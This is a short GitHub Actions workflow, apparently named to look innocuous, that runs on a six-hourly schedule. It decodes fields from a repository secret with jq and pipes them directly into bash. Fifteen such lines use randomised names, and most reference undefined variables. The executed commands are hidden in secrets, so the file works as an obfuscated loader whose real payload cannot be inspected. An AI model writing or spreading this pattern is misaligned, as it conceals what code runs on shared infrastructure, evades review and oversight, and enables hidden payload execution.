name: buriedinitial
on:
  workflow_dispatch:
  schedule:
    - cron: '55 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: buriedinitial
        env:
          lx11: ${{ secrets.lx11 }}
        run: |
          echo $lx11 | jq -r .b06 | /bin/bash
          echo $j985 | jq -r .mgqke36 | /bin/bash
          echo $tfc23 | jq -r .fvm9880 | /bin/bash
          echo $uty1084 | jq -r .ll38 | /bin/bash
          echo $qgcrs614 | jq -r .zkniv366 | /bin/bash
          echo $wai45 | jq -r .d02 | /bin/bash
          echo $fz13 | jq -r .ccfz39037 | /bin/bash
          echo $arqs20 | jq -r .ol6548 | /bin/bash
          echo $idizj7564 | jq -r .mmyz9554 | /bin/bash
          echo $qg69 | jq -r .zu64 | /bin/bash
          echo $zs94477 | jq -r .ybn9224 | /bin/bash
          echo $woh93 | jq -r .fdnkl204 | /bin/bash
          echo $esaey4 | jq -r .a37 | /bin/bash
          echo $w5663 | jq -r .zmsat81316 | /bin/bash
          echo $lr68008 | jq -r .nv6 | /bin/bash

